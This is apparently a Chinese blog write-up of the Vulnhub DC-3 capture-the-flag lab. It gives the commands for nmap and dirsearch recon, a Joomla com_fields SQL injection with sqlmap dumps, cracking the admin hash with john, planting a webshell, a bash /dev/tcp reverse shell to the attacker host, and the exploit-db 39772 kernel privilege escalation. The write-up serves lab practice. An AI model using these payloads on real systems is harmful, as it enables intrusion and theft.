Vulnhub靶机:DC-3渗透详细过程

 靶机下载地址放在文章最后啦

一、靶机的搭建

1.打开文件夹右击使用VM虚拟机打开

2.给虚拟机取个名字(我这里就直接DC-3),选择自己虚拟机存放的位置

3.等待虚拟机的导入

4.直接打开发现报错,编辑一下虚拟机发现还是报错,这是因为我使用的17版本的需要改一下兼容性(虚拟机可能会闪退)。

5.先改兼容性再解决启动问题,选择兼容16版本的就可以了。

6.再编辑虚拟机,解决启动问题。

7.成功启动并进入靶场的登录界面(不知道密码和账号),IP也不知道是好多。

二、渗透过程

1.直接上nmap扫一下存活的IP地址

我这里IP地址有点多,13这台机子应该就是DC-3靶机IP了

nmap -sn 10.189.100.10-20

2.再用nmap扫一下开放的端口

nmap -sV -A -p- 10.189.160.13

3.发现只开放了 80端口,先访问80端口看看

4.我们使用whatweb看看网站的指纹信息,发现是Joomla框架。

whatweb -v 10.189.160.13

5.dirsearch扫一下网站目录,发现了后天登陆地址

dirsearch -u "http://10.189.160.13/"

6.访问后台登陆地址看看

7.百度一下Joomla框架有什么漏洞

8.百度里发现一篇文章,里面的SQL注入可以利用。

文章地址:https://www.cnblogs.com/arrest/articles/17660026.html

9.检查是否存在SQL注入

http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))

10.直接上SQLmap,先爆出数据库。有选项就按Y(不要使用-- batch),耐心多等一会就爆出来了

 sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs

11.发现了joomladb数据库,我们再爆一下joomladb里面的表。有选项就按Y

sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs -D joomladb --tables 

12.我们继续爆表里面的字段,一路按Y,最后按1默认字典,拉一下窗口看着舒服一些。

sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs -D joomladb --tables -T "#__users" --dump

13.我们发现用户名是:admin 密码是加密的,使用kali中的john工具破解密码

 admin $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

14.先使用vi编辑器把密码放在TXT文本里面,在使用john进行破解

vi passwd.txt

john passwd.txt

15.密码就是shoopy,我们登陆一下后台

16.发现一个地方可以上传webshell

17.创建一个shell.php的文件,直接写入一句话

18.使用蚁剑直接连接

http://10.189.160.13/templates/beez3/html/shell.php

19.使用whoami命令查看用户权限是www-data,我们需要提权

20.我们先反弹一下shell,在我们的shell.php插入

<?php
system ("bash -c 'bash -i  >& /dev/tcp/10.189.160.1/6666  0>&1'");
?>

21.访问shell.php并在kali上面使用nc监听,再使用python反弹成交互式shell

http://10.189.160.13/templates/beez3/html/shell.php
nc -l -p 6666

22.尝试了SUID和GIT提权都没有成功,看看系统版本是多少

cat /etc/issue

23.使用searchsploit搜索工具看看有什么可以利用的漏洞,发现一个提权漏洞

searchsploit Ubuntu 16.04

24.我们 具体查看一下漏洞

searchsploit -p linux/local/39772.txt

26.可以使用溢出提权,并且告诉我们了工具的下载地址

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

27.直接使用命令把工具下载到靶机中,并解压

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

28.进入解压后的39772目录,发现两个压缩包

28.使用命令直接解压exploit.tar

tar -xvf exploit.tar

29.安装文本中的提示进行提权操作

cd ebpf_mapfd_doubleput_exploit
ls 
./compile.sh
./doubleput.c

30.成功拿到唯一的flag了

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-3"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值